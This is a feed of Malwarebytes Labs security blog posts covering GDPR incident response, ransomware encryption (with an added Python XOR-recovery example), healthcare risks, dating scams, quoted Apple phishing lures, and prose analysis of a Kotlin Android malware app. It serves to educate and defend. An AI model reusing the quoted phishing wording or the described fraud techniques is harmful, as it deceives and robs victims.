Techie Feeds

How to build an incident response program: GDPR guidelines

Malwarebytes - Wed, 02/21/2018 - 09:00

In today’s computing world, it is not a matter of “if” an organization will get compromised, but “when.” That, together with the European Union’s General Data Protection Regulation (GDPR) going into effect this May, is why many organizations need a robust incident response program to ensure the safety of their customers’ and employees’ data.

Incident response programs need to cover a wide array of regulatory and compliance requirements, technical details, and workflows to ensure companies can adequately and quickly respond to a security incident in their environment. Because of this complexity, I’m going to break the topic of “building an incident response program” into multiple blog posts.

In this first article, I will outline some of the regulatory requirements documented in the GDPR. However, while I address GDPR requirements, I’m also covering some of the basic, underlying tenets of a robust incident response program—one that can also align with other state and country regulations worldwide.

Regulatory requirements

At the forefront of many security professionals’ minds is May 25, 2018: the date when GDPR takes effect. Companies that do business in the European Union (EU) or hold data on citizens of the EU must be compliant with the GDPR requirements by this time.

While there are many other security standards that businesses must meet, such as the Payment Card Industry Data Security Standards (PCI-DSS) for organizations that handle credit card information or the Sarbanes-Oxley Act (SOX) for publicly traded companies, it appears that GDPR has a significantly more stringent set of regulations and a much steeper penalty for non-compliance (up to 4 percent of annual global turnover or 20M Euro, whichever is greater).

Further, there are many other requirements within GDPR that are outside of incident response—so please consult your legal team or an outside expert to ensure all GDPR requirements are being addressed within your company or organization.

From the GDPR website, under Data Subject Rights:

Under the GDPR, breach notification will become mandatory in all member states where a data breach is likely to “result in a risk for the rights and freedoms of individuals”. This must be done within 72 hours of first having become aware of the breach. Data processors will also be required to notify their customers, the controllers, “without undue delay” after first becoming aware of a data breach.

While the above statement only indicates the requirement for notification within 72 hours of identifying a data breach and does not say organizations must have an incident response program, it is evident that in order to meet the 72-hour notification requirement, an organization will need to be in a position to quickly detect a breach within their networks, systems, or applications.

However, the GDPR does specify requirements for incident or breach response directly. Here are some of its high-level requirements:

Rapid declaration: Organizations must report breaches to the “supervisory authority” within 72 hours of becoming aware of them.

Formal incident/breach response policy and plan: Organizations that are disorganized or “fly by the seat of their pants” during an incident are at a much higher risk of not having a complete or thorough response and will likely incur penalties outlined in the GDPR. Developing an incident response program—creating policies and procedures, and ensuring everyone is aware of the program—will go a long way in establishing a base from which to work when an incident or breach occurs.

Data inventory: It becomes critical to know where an individual’s data is being stored so the incident response team can quickly know the potential impact of a security event on a system or application.

Impacted individual notification: Having an accurate inventory of what data is being stored will help with any potential individual notifications in the event of a breach. Know who is impacted and have a process to notify them in the event of a breach. The communication with individuals must describe the nature of the breach and recommendations to mitigate potential adverse effects.

Communication plans: Some communications requirements have been identified above; however, internal communication between impacted departments and groups is also critical to ensure a smooth response to an incident or breach. It is also vital that the communication plan identify who is authorized to talk to external entities, such as the press or law enforcement.

Incident response structure: One key decision an organization needs to make is: Should we build a program internally or utilize a Managed Security Service Provider (MSSP) for detection and/or response? If using an MSSP, organizations should routinely test it to ensure effectiveness and timely notification, as it is ultimately up to the organization to comply with regulatory requirements and timeframes.

Detection: The ability to detect an attack or security event has always been critical to an organization, but now a failure to detect an attack may be grounds for GDPR penalties. If an organization can detect and take action against an adversary within the network, the organization could prevent or reduce GDPR penalties, especially if an attack is stopped prior to exposure.

Incident/breach response: Within the response framework, the ability to quickly analyze what the attackers may have accessed or copied will go a long way in minimizing the potential impact to the organization and, most importantly, to the individuals that were impacted.

Effective response: A documented and approved program is an important step; however, if staff are not aware of the program and trained on the process documentation, and if the program is not routinely tested, the response will not be effective. The Incident Response Program must be regularly audited and communicated to staff to ensure its effectiveness and completeness in the event of a breach.

While I have a pretty good grasp on how GDPR will impact Information Security Operations and Governance groups, I recommend you consult with your Legal and Privacy Teams prior to implementing or dismissing any controls that could be related to GDPR and, for that matter, to other regulatory requirements.

Next up: creating the framework of an incident response program and team.

The post How to build an incident response program: GDPR guidelines appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Encryption 101: a malware analyst’s primer

Malwarebytes - Tue, 02/20/2018 - 21:53

While most in the security industry know what encryption is, many lack a basic understanding of how it is used in malware—especially ransomware. Because of this, we thought it would be beneficial to do an introductory primer on encryption mechanisms and how they are exploited for malicious purposes.

We will start with an introduction to encryption in general, and follow up with the main methods ransomware uses to encrypt files. In part two of this blog series, we’ll use a recent ransomware variant detected by Malwarebytes as Ransom.ShiOne to highlight the key weaknesses in encryption to look out for when trying to decrypt files.

What is encryption?

In the simplest of terms, encryption is the process of encoding information so that only authorized parties can access it, and those who are not authorized cannot. In computing, encryption is the method by which data is converted from a readable format (plaintext) to an encoded one (ciphertext) that can only be decoded by another entity if they have access to a decryption key. While encryption was long used by the military to facilitate secret communication, today it is used to secure data in transit and in storage, as well as to authenticate and verify identities.

Unfortunately, encryption is also used for malicious purposes, as is the case with ransomware.

Evaluating the encryption

If a malware analyst wants to effectively evaluate malicious encryption, he needs to observe the encryption on the machine that is creating or receiving the encrypted data. If you have access to a process before it has performed the encryption phase, you will typically have enough data to be able to decrypt, or to simply view the natively decrypted data.

Being the observer is the only chance you have to recover files without needing to crack the encryption. However, for a ransomware attack, being an observer usually isn’t possible. After the malware finishes running and sends off the encryption keys, it is too late. When the malware shuts down, you can no longer be the observer. Now you must rely on analysis and hope there is a flaw in the encryption.

What exactly does it mean to be an observer of decryption and encryption? Someone once asked me:

Why do malware authors not always encrypt communication to a C2 server?

My answer to him was that malware is public, in that it can run on random victim systems throughout the world. As reverse engineers, we always have access to the binary and are able to inspect the software on the lowest, most detailed level. A secure communication is meaningless at this level because we will be looking at the system before encryption and after decryption.

An SSL or HTTPS communication received on the client side (the victim computer) will be decrypted in memory for the data to be processed in whichever way the malware intends. At this point, we will always be able to inspect memory and pull the decrypted communication out in its raw form, so encryption really doesn’t hide anything when a server sends encrypted data down to malware that is being analyzed.

This same logic applies to many use cases in ransomware and file encryption. If we are looking at ransomware that generates its encryption keys locally, we can observe the keys in memory immediately after creation, save them out, and use those keys from memory to decrypt files after the ransomware runs, provided we are able to determine the algorithm used for the encryption.

If the user dumped the process’s memory while the ransomware was running and encrypting files, he has a chance of being an observer, and a likely possibility of recovering files. This is unfortunately not a typical scenario, as a victim’s first instinct is not to create a memory dump while continuing to allow the process to run. But as a theoretical example, it technically can work.

Ransomware algorithms

Over the years, we have come across many algorithms used to hold victims’ files hostage. The most common of these involve the use of standard, public, and proven algorithms for asymmetric encryption. But occasionally we see custom encryption (which is likely weaker) or even simple, obfuscated methods to hold files hostage.

Years ago, when I would come across ransom malware, it would typically use alternative methods for holding the victim computer as ransom, rather than encrypting all files on the drive. I have seen everything from file hiding and custom crypto to Master Boot Record (MBR) rewriting.

File obfuscation

In the case of file obfuscation, the ransomware simply would move or hide targeted files—documents and anything else it believes the victim would care about—and ask for a ransom to recover the files. In this case, recovery is trivial. You can simply reverse the code that is performing the hiding and be able to reverse the actions it took.

Here’s an example: A fake pop-up claims your hard drive is corrupt, and asks you to call and pay for “support” to recover the files. On this particular malware I analyzed, it displayed a pop-up window (shown below), and simply moved all the documents and desktop files into a new folder in a hidden location. The fix for this was looking at the code to see which files it moved and to what location.

Custom cryptos

When dealing with custom cryptos, typically a file is passed through an algorithm that modifies the file in a standard way. A simple example would be every byte in the file being XORed by a constant or a cycling set of bytes. In these cases, you can almost think of the algorithm itself as the key. If you can reverse the algorithm, you can figure out exactly how it is modifying or encrypting the file. Then, simply reversing the steps will give you the original file. In contrast, when faced with asymmetric cryptography, the algorithm itself will not provide you with enough to be able to decrypt a file.
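As an added example (not code from the original post), here is how an analyst can undo the cycling-XOR scheme just described without ever seeing the key: a PNG’s fixed signature and IEND trailer serve as known plaintext, XORing them against the ciphertext exposes the keystream at those offsets, and the shortest key period consistent with every exposed byte is the key. The file body, the 5-byte key and the function names are constructed for the illustration.

```python
"""Recovering a file scrambled by a 'custom crypto' that XORs every byte with
a cycling key. Added example; the key and file contents are constructed."""
from itertools import cycle
from typing import Optional

# Real PNG constants: the 8-byte file signature and the 12-byte IEND chunk
# that closes every PNG (length 0, type "IEND", CRC 0xAE426082).
PNG_MAGIC = bytes.fromhex("89504E470D0A1A0A")
PNG_IEND = bytes.fromhex("0000000049454E44AE426082")


def xor_cycling(data: bytes, key: bytes) -> bytes:
    """The 'custom crypto' itself. XOR is its own inverse, so this both
    encrypts and decrypts: the algorithm plus the key bytes is all there is."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_key(ciphertext: bytes, known: list,
                max_key_len: int = 64) -> Optional[bytes]:
    """Derive the cycling key from known plaintext fragments.

    known: list of (offset, plaintext bytes) pairs the original file must
    contain. Ciphertext XOR known plaintext exposes the keystream at those
    offsets. Returns the shortest key period in which every key slot is
    covered and at least one slot was seen twice without contradiction, or
    None when the fragments are too short to pin the key down (for instance
    a key longer than the known plaintext)."""
    samples: dict = {}                    # file offset -> exposed keystream byte
    for offset, plaintext in known:
        if offset < 0 or offset + len(plaintext) > len(ciphertext):
            return None
        for i, p in enumerate(plaintext):
            pos = offset + i
            k = ciphertext[pos] ^ p
            if samples.setdefault(pos, k) != k:
                return None               # overlapping fragments disagree
    for period in range(1, max_key_len + 1):
        key = [None] * period
        consistent = True
        for pos, k in samples.items():
            slot = pos % period
            if key[slot] is None:
                key[slot] = k
            elif key[slot] != k:
                consistent = False        # two exposed bytes contradict this period
                break
        # len(samples) > period guarantees some slot was actually cross-checked.
        if consistent and len(samples) > period and all(b is not None for b in key):
            return bytes(key)
    return None


def recover_png(ciphertext: bytes) -> Optional[bytes]:
    """Recover a XOR-scrambled PNG using its fixed header and trailer as known
    plaintext. Returns the plaintext, or None if the key could not be found."""
    known = [(0, PNG_MAGIC), (len(ciphertext) - len(PNG_IEND), PNG_IEND)]
    key = recover_key(ciphertext, known)
    if key is None:
        return None
    plaintext = xor_cycling(ciphertext, key)
    # Sanity check: the restored bytes must still look like a PNG at both ends.
    if not (plaintext.startswith(PNG_MAGIC) and plaintext.endswith(PNG_IEND)):
        return None
    return plaintext


# Constructed sample: a minimal PNG-shaped file (the body is filler, not a
# valid image) scrambled with a constructed 5-byte cycling key.
SAMPLE_PLAINTEXT = PNG_MAGIC + b"IHDR" + bytes(range(40)) + PNG_IEND
SAMPLE_KEY = bytes.fromhex("5AC31F770E")
SAMPLE_CIPHERTEXT = xor_cycling(SAMPLE_PLAINTEXT, SAMPLE_KEY)

if __name__ == "__main__":
    trailer_at = len(SAMPLE_CIPHERTEXT) - len(PNG_IEND)
    key = recover_key(SAMPLE_CIPHERTEXT, [(0, PNG_MAGIC), (trailer_at, PNG_IEND)])
    print("recovered key:", key.hex() if key else None)
    print("file restored:", recover_png(SAMPLE_CIPHERTEXT) == SAMPLE_PLAINTEXT)
```

The same approach works for any file type with fixed bytes at known offsets; when the key is longer than the plaintext you can vouch for, `recover_key` returns None rather than guessing.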

MBR rewriting

In the third scenario, the MBR would be rewritten with a small program that requires a password or serial number for access. The malware would force a reboot of the computer, and before the system would load Windows, it would first prompt the user with instructions on how to pay the ransom to receive a passcode. In this scenario, reversing the serial or password validation algorithm within the boot record (essentially creating a keyGen), would provide you with the ability to know which password would allow access. Alternatively, rewriting that portion of the hard drive with the factory boot record would also disable the lock on your computer.

Aside from reversing the algorithm, the only difficulty here would be knowing how to rewrite the MBR yourself in order to restore the original code to this section of the drive.

Below is an example of an MBR locker. Notice that no ID is asked of you, which means there is nothing unique to the specific blockage, and a static unlock code is likely to be needed.

Now, these three alternative methods are not quite using encryption in the standard sense of the word, but I am mentioning them here because they show that custom-written, closed-source obfuscation is sometimes trivial to break. The reason most criminals use standardized, public, open-source encryption algorithms to encrypt files for ransom is that they are tested and reliably secure. That means you can know every detail about the encryption algorithm but it won’t matter—you can’t decrypt the data by any method other than having the decryption key.

Why is this important? Encryption using standard, open-source code is built off of the relationship between the encryption keys. The algorithms used simply derive two separate keys that are related. This concept is called asymmetric cryptography, and it is the method of encryption that the vast majority of ransomware authors use today.

Asymmetric cryptography basics

Asymmetric encryption involves generating two keys that are completely different; however, they share a relationship. One key (the public key) is used to encrypt the data into ciphertext, while its companion (the private key) is used to decrypt the ciphertext into the original plaintext. It is called asymmetric because the public key, although it was used to encrypt, cannot be used to decrypt. The private key is required to decrypt.

In encrypted communication that uses asymmetric cryptography, two keys are generated locally—the public key and the private key. The public key is available for the whole world to see. If someone wants to send a message that only one person (Bob) could read, they would encrypt the message using Bob’s public key. Because his public key cannot be used to decrypt the message, it is completely safe. Using his offline private key, Bob would be able to decrypt the message and see the original text.

Here are a few visualizations to help you understand.

This is the same method used by ransomware authors for file encryption. A basic run-through of an encryption process goes as follows:

An array of random numbers is generated. This series of bytes will be used before the first round of the file encryption. Typically, a mathematical series of operations is performed on the public key using this random initialization to, in effect, create a sub-key derived from the initial key. This sub-key will now be used to actually encrypt the file data. During the first phase of the encryption process, a second random array is generated, which will be used as an initialization vector (IV). Every stage following will use the output of the previous stage as its new IV.

A random number is first used as the IV, then the generated ciphertext is used for the next round of encryption.

The generation of the keys themselves also relies on a random number generator. So as you can imagine, having a solid and “as random as possible” generator is extremely important.

Ransomware file encryption

Modern ransomware typically does one of a couple things: Either it dynamically generates the keys locally and sends them up to the C2 server attached to the client ID, or the keys are generated by the author and are preloaded into the ransomware itself.

The latter, although arguably more secure, requires a lot of overhead in generating a completely new binary for each victim, or at least distributing a batch of identical malware using the same key in each campaign version. The trade-off here is that although the key generation cannot be observed directly and inspected for weaknesses by an analyst, two victims will actually have the same encryption keys. So if one person pays the ransom and shares his keys, everyone else impacted by that campaign version can decrypt their files for free. This is a weakness via leaked keys.

Now, if the keys were dynamically generated, it allows the slim potential usage of a memory dump for file recovery, and also the slim possibility that an analyst can find a hole in the encryption. (The memory dump is not that big of a problem for the malware author because, as we said earlier, it is rare when a user knows that he should create a dump). However, the benefit to this local key generation method is that the malware is fully dynamic, and no two people will share the same key. Both methods have their share of weaknesses and strengths.

Modern ransomware authors typically use one of these forms of standardized encryption—AES, RSA, Blowfish, etc.—to try and make the victim’s files unrecoverable without the author providing the decryption key. The reason I say “try” is because there are many cases where these good algorithms are being misused (which will allow the same key to be generated twice). In addition, the transfer and generation of keys can be intercepted.

Asymmetric cryptography encryption may be near impossible to crack, but that doesn’t mean it can’t be broken. To learn how, tune in for our next blog, which uses the ShiOne ransomware to demonstrate how malware analysts can look for weaknesses in encryption.


A week in security (February 12 – February 18)

Malwarebytes - Mon, 02/19/2018 - 16:55

Last week on Malwarebytes Labs, we looked at a huge Android cryptomining campaign, malicious apps on Google Play, and some Apple scams doing the rounds. We also explored the world of healthcare security, and dived into the land of scammy Valentine’s Day tricks and cheats.

Other news

Stay safe, everyone!


Physician, protect thyself: healthcare cybersecurity circling the drain

Malwarebytes - Thu, 02/15/2018 - 16:00

No one knows you better than you do. But thanks to technology advances and the continued digitization of how healthcare data is collected and shared, we can honestly say the same about your healthcare provider.

Indeed, every time we get in touch with a health professional, data is recorded (either on paper or electronically), entered into a computer, and then stored in a massive database for record-keeping, analysis, and retrieval.

This digital warehouse of electronic health records (EHR), which contain medical history, diagnoses, and medications (including billing data, insurance, and other personally identifiable information), is what cybercriminals are after. For healthcare facilities in the business of research, intellectual property is their primary asset at risk. Such a trove in the wrong hands could mean nothing good.

A horripilation of dread

Dismally, where healthcare excels in medical breakthroughs and advances in therapy, it lacks in cybersecurity preparedness and adoption of privacy practices. Studies from independent organizations consistently reveal that the continuous use of legacy systems—those outdated programs and computers running Windows XP—scarce resources allocated for cybersecurity, and an apparent shortage of IT professionals top the list of problems the healthcare industry faces. And this is just the tip of the iceberg.

Technological advancements that make reviewing, sharing, and storing digital information possible present other significant challenges that need addressing. They include:

  • The easy accessibility of patient records
  • The automation of clinical systems (e.g. the ordering of prescription medicine for patients)
  • The introduction of external media or third-party devices to the hospital network
  • The emergence of mobile health apps
  • The increasing adoption of BYOD
  • The overall lack of awareness of risks to patient health data among hospital and clinic staff

Below, we take a look at the cybersecurity risks that each of these challenges present.

Easy accessibility of patient records

Public-facing healthcare facilities like hospitals and clinics have embraced the move from paper records to digital records. In so doing, they gather and store patient data into databases open to anyone with access to them, whether it be a doctor 20 miles from the building or a nurse at the reception desk.

The digitization of patient health records also made the process of sharing information across multiple healthcare facilities easier. Patients, too, are given access to their health records. Because of this, the likelihood of exposure to threats increases.

All that storing, retrieving, and sharing leaves the door open to malicious actors who can just as easily infiltrate the database to steal information and sell it on the black market. How valuable is patient data? Very valuable. Medicare ID numbers belonging to 10 patients, for example, are being sold for 22 Bitcoins, which amounts to more than $200,000 as of this writing. EHRs carry a hefty price tag because this is the kind of data that criminals can use and reuse for decades. And unlike credit card data, medical records cannot be altered or canceled once used in fraud.

Read: Think tank summarizes what happens to healthcare records after breach

Automation of hospital and clinic systems

Removing redundant and tedious tasks from healthcare professionals’ workday is a sound business move. It increases productivity, saves money, and improves the patient experience. However, as much good as automation has brought the industry, the implementation of its systems may have been carried out without cybersecurity or privacy in mind.

Those who quickly went about deploying automation for services like refilling prescriptions or making appointments might have medical devices and web-facing computers in the same network when they should be separate, for example. When medical devices are networked on the Internet and not secured, that leaves the door open for threat actors to exploit.

External media or third-party devices

Although the use of unencrypted external media and portable devices is against HIPAA (Health Insurance Portability and Accountability Act of 1996) standards, staff and third-party contractors continue to introduce such devices to computer systems connected to the hospital network. There have also been instances where patients have brought their medical records in via external media for doctors to review.

Two possible ends could come from this: portable media and devices might get stolen or misplaced, resulting in a security breach, and/or malware might be introduced to the network. Ideally, both ends should be avoided at all costs.

Mobile health apps

We’re talking about mobile health, or mHealth, apps used by patients and medical professionals alike. These apps collect data from whoever uses them, and if doctors have access to this data, they can readily provide feedback or advice. Unfortunately, there is no such thing as “one app that rules them all.” There are thousands of them out there in the market, believe it or not. And each one of them needs to be secured, or all that data risks being leaked.

Bring Your Own Device (BYOD)

In 2012, Aruba Networks published the results of their survey, revealing that 85 percent of healthcare staff and professionals support the use of personal mobile devices, such as smartphones, laptops, and tablets, at work. Some say this trend is a natural fit for the industry as doctors and nurses are frequently on the move.

Being able to access records on the fly and sharing them with colleagues increases collaboration and productivity among healthcare staff. However, mobile devices owned by hospital staff and professionals are liable to theft. If they are not encrypted, it’s easy enough for the thief to retrieve, make use of, or sell the EHR stored in them.

Some hospitals and clinics also allow patients and visitors to connect to the facility’s Internet. This results in both patient and staff member BYOD devices overwhelming the bandwidth. On top of this, no one is really sure if such devices are secure enough, if at all. If a potentially infected device is introduced to the network, malware could take residence in the server or spread to other devices connected to the network.

Read: BYOD, why don’t you?

Lack of cybersecurity awareness

Lastly, healthcare staff are generally unaware of threats to patient data and are poorly prepared to identify attack types. This is probably why they may appear negligent in handling email, mobile devices, and hospital records. As we have already established, cybersecurity issues are not just something that IT staff should scramble to address. Everyone, including nurses and doctors, has a responsibility to uphold when it comes to protecting patient data and securing hospital resources from external threats.

Sadly, there’s no panacea in sight

Unfortunately, there’s no magic bullet to address the myriad of challenges born from an environment this complex. In fact, addressing problems and risks surrounding something this important shouldn’t be rushed. People’s lives, after all, are at stake here, too. Although an overhaul may be needed to completely turn things around for the healthcare industry, this still takes a considerable amount of time to implement. And even if it has been completed, continuous improvement must naturally follow.

The good news is that healthcare facilities, regardless of size, don’t have to wait for a major revamp to happen before they can address the current dilemmas plaguing their industry. In part 2 of this post, we’ll discuss steps healthcare organizations can take to stay secure—beginning with awareness and education campaigns.

Until then, be well and stay safe!


Online security tips for Valentine’s Day: how to beat the cheats

Malwarebytes - Wed, 02/14/2018 - 17:07

Valentine’s Day is upon us once more, and so are lots of dating-friendly security tips. Read on and secure your profile, alongside (one hopes) the love of your life.

1. Not so hot singles in your area

Many dating apps have geotagging enabled, regardless of whether you created your profile on a website or through the app itself. Some dating sites use the location you initially enter to serve up a list of possible matches within a certain radius, but they don’t display the location info on your profile.

Get familiar with the granular controls on the dating site’s settings and make sure you understand the differences. Many mobile apps aren’t hugely clear about which thing does what, so if in doubt, disable a particular feature until you can be 100 percent sure. As a side note, ensure you don’t have geotagging enabled on any photographs you upload. If in doubt, use a picture from a public location away from your main residence. You can also use online tools to check what EXIF information is stored in images you want to use and remove it if needed.

You’ll find some additional practical advice in terms of real-world security on the Selfie Security blog we posted a while back. You should pay particular attention to not including location-specific items in your photograph(s), such as bills with your address on them. Of course, if you want to enable geotagging then go ahead—just be mindful of the issues that could arise. The easier you are to find, the easier it is for that one terrible date you had to hang around your home, workplace, or just generally trail around familiar locations and become a major nuisance. We see many cases of stalking due to jilted hangers-on from dating apps—don’t fall into this trap.

If stalking does happen to you, go to your local police department and let them know what’s happening. Depending on how much information the other person has, it may already be too late to go on blackout, but you can at least let those in authority know that somebody is pestering you.

2. Money thieves in your area

Scammers setting up fake profiles and then asking for money is astonishingly common, and it’s all too easy to be taken to the cleaners as a result. Just like 419 scams, romance fakers often use templates—or just lazily cut and paste bot spam to reuse for their own purposes—and fans of dating sites should get into the habit of Googling common phrases, just to see if someone else is saying the same thing. If Steven J. Fakename is posting identical romantic overtures on six different sites, you can be sure it’s time to move along.

With regard to common scam angles, watch out for anything related to:

  • Sick relatives
  • Medical emergencies
  • Lost overseas and need a plane ticket
  • Lost passport and need a visa/replacement passport
  • Wallet stolen and no funds available
  • Coming to visit, but there’s a last minute ticket price hike and I need your help

On a related note, don’t ever let strangers send money to your bank account for any reason. They’ll probably get you to forward the cash on to someone else, and at that point, you’ve become a money mule.

That’s a criminal offence, and you really don’t want to be doing any of those.

3. My other profile is also in your area

Be cautious around links sent your way that direct you to another website, and be particularly careful around links to downloadable files. Scammers will often try and remove you from the relative safety of the service you happen to be using, directing you to links and files that the dating site you started with can’t hope to contain. That’s been a staple attack on social media sites for many a year, but it works with dating too.

If someone sends you shortened URLs, you can usually expand them to see where they end up. If you’re still not sure, try googling the link. If still nothing comes up to allow you to make an informed decision, you should just ignore whatever you’ve been sent—it isn’t worth the risk. You’ll probably want to block and report the sender while you’re at it.

4. Personal information in your area

Don’t put your real name, age, or location in your profile, email, or anything else related to the dating site you’re on. Anonymous usernames are fine. You should also use a disposable email address when you sign up to a new dating service—not only will this keep people you’d rather not stay in touch with away from your main mailbox, it’ll also be obvious if a dating site decides to sell your email to spammers. This is a good trick to use outside of online dating, too. Of course, the less personal information you put on a dating profile, the more likely it is that potential suitors may simply move on. As with everything, the decision is yours.

5. Bots in your area

If you have an open private message system, you’ll likely receive many, many messages from people wanting to chat. Some dating websites will also send multiple daily messages to users via email claiming that persons x, y, and z would like to talk to you. They may even ask about cookie dough (and it better be delicious considering the eventual $118.76 monthly fee). Most dating bots will cycle through a canned script of a dozen or so phrases before claiming you need to be “verified” in some way. This will inevitably lead to a request for payment information.

Don’t do it. If in doubt, contact the service you’re using and ask them about it directly. You’ve probably seen examples of this on blogs about Skype spam.

Bots will advertise everything from pornography to mobile games, and spammers commonly use images ripped from the net for their profile avatars. You can try and see if the picture is a stock photo by using the “Search Google for this image” option in your browser, or fire up TinEye to see what’s out there.

Bot accounts probably won’t have a realistic looking bio, or have links to profiles on popular social networks. If it looks cookie-cutter, there’s a good chance it might be. Feel free to see if they pop up across the web anyway and you’ll quickly learn if they’re one of a kind or part of a wave of identikit bots. The bottom line is that nobody is going to start sending you random messages that you’re their hero and can we get married in 10 minutes please, so approach any and all conversations with a healthy dose of skepticism from the outset.

6. Dubious pics in your area

Be wary of people asking for intimate photographs and/or video, as this is a surefire way to find yourself blackmailed into handing over lots of money. If you do pay the blackmailer, there’s no guarantee the images won’t be leaked anyway. There’s also the issue of revenge porn to consider, and the legal issues that will inevitably arise as a result.

Put simply: don’t do it. Again.

Even with these precautions in place, problematic pieces of tech, such as the recent Deepfakes furore, ensure that anyone placing even a few dozen images or videos online could end up in a (fake) pornographic movie. Given that people tend to place many, many photos of themselves in their best light on dating pages, along with the occasional movie clip, it might be an idea to at least roll back the volume of photos you have of yourself online.

Hopefully, the above will help to keep you out of trouble while swiping left, right, up, and quite possibly down. Here’s to a safe online Valentine’s Day experience for everybody.

The post Online security tips for Valentine’s Day: how to beat the cheats appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Panic attack: Apple scams apply pressure

Malwarebytes - Tue, 02/13/2018 - 18:31

We’ve seen a number of Apple-related phishes in circulation over the last few days. While most of them already lead to deactivated phishing sites, we thought it was worth highlighting some of the tricks being used to bait people into handing over payment details at the moment.

Fake receipt emails

First up, a number of fake “receipt” emails ranging in date from February 2–6. While the content of some of the emails varies slightly, most of them use a subject line similar to the below:

[ New Statement ] Your receipt from Apple [ 02 February 2018 ]

In the cases we’ve seen, the mails claim to be receipts for a payment of $9.99 made out to, er, Mr. Edward Snowden. Apparently, privacy campaigns and 2 terabyte storage plans go together nicely.



The general rule of thumb is to try and be as inconspicuous as possible, so we’re not really sure why the scammers went with one of the most well-known privacy advocates on the planet to fill in the personal information box. Not only that, but they used a randomly-grabbed address from a property website sporting nine bedrooms and four bathrooms.

Maybe the plan is to hit the potential victim with something so utterly ludicrous, that they’ve already clicked the link before they’ve had time to think about it. For a lot of people, simply seeing a “Thanks for the order of this thing that costs you money” would be enough to have panic set in.

The good news for potential clickers is, the site the scammers are trying to bounce through is already wise to the scam and has effectively killed the one-way street to the phish page.


The phish link itself is also offline, so we can’t show you what may lay in wait. But we can confirm people won’t be losing money to this one anytime soon.

Someone else logged in

Elsewhere, we have a “Reminder” notification that someone else is logging in on your Apple account with an iPod in Monaco.


The email reads as follows:

[Reminder] [Notification Update] Statement new log-in your Apple account with other device Fοuг уοuг ѕаfеtу, уοuг Αррlе ID hаѕ Ьееn lοсκеd Ьесаuѕе wе fοund ѕοmе ѕuѕрісіοuѕ асtіνіtу οn уοuг ассοunt. Ѕοmеοnе ассеѕѕіng уοuг ассοunt аnd mаκе ѕοmе сhаngе οn уοuг ассοunt іnfοгmаtіοn. This the details :
Country : Monaco
IP Address :
Date and Time : 13:09, 06 Feb 2018
OS : iPod
Browser : Safari If you did not make these action or you believe an unauthorized person has accessed your account, you should login to your account as soon as possible to verify your information.

Apart from the lazy typos (“Four your safety”) and awful sentence structure, they also make use of some Cyrillic characters in a likely attempt to bypass Bayesian filtering. While the destination site was offline again, it’s worth noting that all of the examples tried to send potential victims to HTTPS websites, instead of the plain old HTTP landing page. All phishers now want to look as “secure” as they possibly can—anything to help pull the wool over your eyes.

Always worth repeating: just because a website is HTTPS does not mean it is a legitimate website. Phish pages can lurk anywhere, no matter what security the page you’re on happens to be touting.

Apple care scare

There are also some dubious texts going around claiming to be from Apple Care:

It reads as follows:

Final Notification Your Apple ID is due to expire today. Prevent this by confirming your Apple ID at appleid-revise(dot)com Apple Inc

As you can see, there’s a big push to apply pressure to potential victims, and everything falls somewhere between the two extremes of “Payment made, quick do something!” and “So, your account is going to be terminated.” While we’re happy to say this is another one that came to our attention already DOA, even as texts were going out, the sad truth is that for every site taken down there are many more happily accepting credit card details and personal information.

Fake app purchases

We’ve also seen some fake app purchases, and this one rather spookily has an order number attached that was actually of some relevance to the recipient.

Be aware of Apple Phishing email! (See pic) I checked my payment source, & called Apple. They DO NOT have a link in the receipt emails. The order ID was a valid one from a purchase 2 months ago. (Not this purchase) #TeamEmmmmsie #TUGfam #MGC #AppleSupport

— Rick92647 [TeEm] [TugFam] [MGC] (@Rick92647) February 5, 2018

While one hopes this is just some horrible coincidence, it could just as easily have prompted the above individual to start visiting rogue links—and that’s all it really takes. Just one fragment of information from an otherwise garbled email missive could be enough to cost someone a small fortune—or even worse, a very large one.

If you’re worried about the pushy tone of a supposed Apple missive, contact them directly to check its validity, and wander over to their help page for more information on securing your Apple account. These are some of the most common scams around, and for as long as Apple IDs are tied to valuable purchases and personal information, criminals will continue to target these accounts.


Kotlin-based malicious apps penetrate Google market

Malwarebytes - Tue, 02/13/2018 - 16:00

An open-source programming language, Kotlin is a fully supported official programming language for Android. Google boasts that Kotlin contains safety features in order to make apps “healthy by default.” Many apps, from the hottest startups to Fortune 500 companies (Twitter, Uber, Pinterest), are already built with Kotlin.

Concise while being expressive, Kotlin reduces the amount of boilerplate code needed to create an app—which makes it much safer. However, as revealed by Trend Micro researchers, the first samples of Android malware created using Kotlin were found on Google Play. Introducing: Swift Cleaner, a utility tool built with Kotlin that claims to clean and optimize Android devices.

This malicious app is capable of remote command execution, can steal personal information, carry out click fraud, and sign users up to premium SMS subscription services without their permission. So much for safe.

Analyze this

After launching Swift Cleaner, the first thing the malware does is call PspManager.initSDK, check the phone number, and send an SMS message to a particular number given by the C&C server. The app does this to check for the presence of a SIM card and whether mobile carrier services are available.

Upon server interaction, the malicious part of the app launches URL forwarding and click fraud activities. Click fraud is an illegal practice that occurs when individuals click on a website’s advertisements (either banner ads or paid text links) to increase the payable number of clicks to the advertiser. In our case, the app clicks on a URL, which leads you to a survey. At the end of the survey, you are given an opportunity to get some free services if you click on the claim link. By clicking the button, you will then be redirected to another possibly malicious website.

Meanwhile, Swift Cleaner collects personal information from the infected mobile device, such as the International Mobile Equipment Identity (IMEI), International Mobile Subscriber Identity (IMSI), and information about the SIM card. The stolen information is then encrypted and sent to the remote Command and Control (C&C) server.

There are services that run in the background in order to communicate with a C&C server. Swift Cleaner compromises one of these services: the Wireless Application Protocol (WAP). WAP is a technical standard for accessing information over a mobile wireless network.

The app is using WAP in conjunction with JavaScript in order to bolt on CAPTCHA bypass functionality, using mobile data and analyzing the image base64 code. CAPTCHA images are parsed and cracked, and the image data will later be uploaded to the C&C server. This data is needed to train the neural network. Later on, all the image samples will be useful for finding the best match for each character of the new upcoming CAPTCHA.

Premium SMS service

The Swift Cleaner malware also uploads information about the user’s service provider along with login information and similar sensitive data to the C&C server. This can automatically sign users up for a premium SMS service, which will cost money.

Premium rate SMS is a form of mobile billing where the user pays for a premium service by either receiving or sending a message. There are two ways this billing service works:

  1. Mobile Originated (MO): where the mobile user pays to send a message (used for once-off services, such as competitions)
  2. Mobile Terminated (MT): where the mobile user pays to receive a message (used for subscription services)

Our example app uses the premium SMS MO service, and redirects users to webpages where they can select to send a message.

Neverending story

